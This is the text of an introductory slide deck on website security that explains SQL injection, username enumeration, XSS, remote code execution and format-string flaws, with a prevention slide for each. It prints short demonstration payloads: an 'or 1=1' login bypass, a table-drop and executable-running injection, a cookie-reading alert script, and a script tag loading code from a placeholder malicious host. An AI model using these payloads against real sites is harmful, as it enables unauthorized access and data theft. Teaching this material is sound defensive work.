SECURITY VULNERABILITIES IN
WEBSITESby Brian Vees
Five Types of Vulnerabilities
SQL Injection Username Enumeration Cross Site Scripting (XSS) Remote Code Execution String Formatting Vulnerabilities
SQL Injection A very common, and easy to exploit
vulnerability Requires basic SQL knowledge
The basic idea: Find a user-inputted field that most likely is used to
query a database Insert text in the field which will then merge with the
SQL query being executed Examine the results to gain info about the database Using this info, write better queries to receive
potentially private data
SQL Injection - Example Given a sample login
prompt on a webpage:
Query to validate username might look like this:
Entering a single apostrophe “breaks out” of the intended SQL code, allowing other code to be executed
query = "select * from user where username='" + tbUserName.Text + "'";
SQL Injection – Example (Cont.) Entering this data
causes the followingquery to be sent to thedatabase:
Since 1=1 is always true, this query returns all users in the database
select * from user where username='' or 1=1 --'
Other Examples SQL injection to obtain error messages
containing useful data SQL injection to delete data
('drop [tablename]--) SQL injection to execute filesexec sp_oamethod @o, 'run', NULL, 'executable.exe'
SQL Injection Prevention “Escape” apostrophes String replacement on SQL-specific
character combinations (“--”) Safest: reject any bad input rather than
attempting to “cleanse” it Not necessarily plausible: names like O’Brien
and other valid input contain apostrophes
Username Enumeration A very simple method of finding valid
usernamesInvalid Username Valid Username
Username Enumeration Prevention
Use the same error message for invalid password and invalid username
This way an attacker has no idea whether or not the username is correct
Cross Site Scripting Another type of code injection, but with
client-side script Can be used to bypass client-side
security, as well as gain other information (session cookies)
Yahoo! and even Google have previously fallen victim to this vulnerability
XSS Example This form echoes what the
user entered in the case of an invalid login (i.e. invalid characters)
What if we input JavaScript?
Why Is XSS Dangerous? Consider if we now input the following code:
<script>alert(document.cookie)</script>
With this data, we can bypass cookie-based security
Also, external, lengthier scripts can be injected:<script src=“http://www.malicioussite.com/javascript.src”></script>
XSS Prevention User input cleansing Don’t echo user input back unless it is
necessary
Remote Code Execution Potentially the most dangerous
vulnerability Stems from unsecure settings on a web
server
Remote Code Execution Example
In PHP, the register_globals setting is often set to “on” to ease development
This allows for global variables to be set remotely
require($page . “.php”); If $page is not initialized, any arbitrary
file can be included and will be executed on that server
XML Vulnerabilities There are several XML specifications that
are also vulnerable to remote code execution
Improperly validated XML can “break out” of the XML, and execute malicious code
Remote Code Execution Prevention
Ensure web server configuration is secure (namely, if using PHP, turn register_globals off)
Validate user input
String Formatting Vulnerabilities
An attack on server-side functions that can perform formatting (such as C’s printf)
Special characters are used to read or write sections of memory that normally would not be accessible
String Formatting Example %s can be used to continue reading data
off the stack until an illegal memory address is attempted to be accessed, crashing the program
%x can be used to print areas of memory that are normally not accessible
%d, %u, and %x can be used to overwrite the instruction pointer, allowing the execution of user-defined code
String Formatting Vulnerability Prevention
Make sure and verify all user input Replace or reject special characters (“%”)
Conclusion What is the golden rule that will stop the
majority of these website attacks?
Validate User Input!
Top Related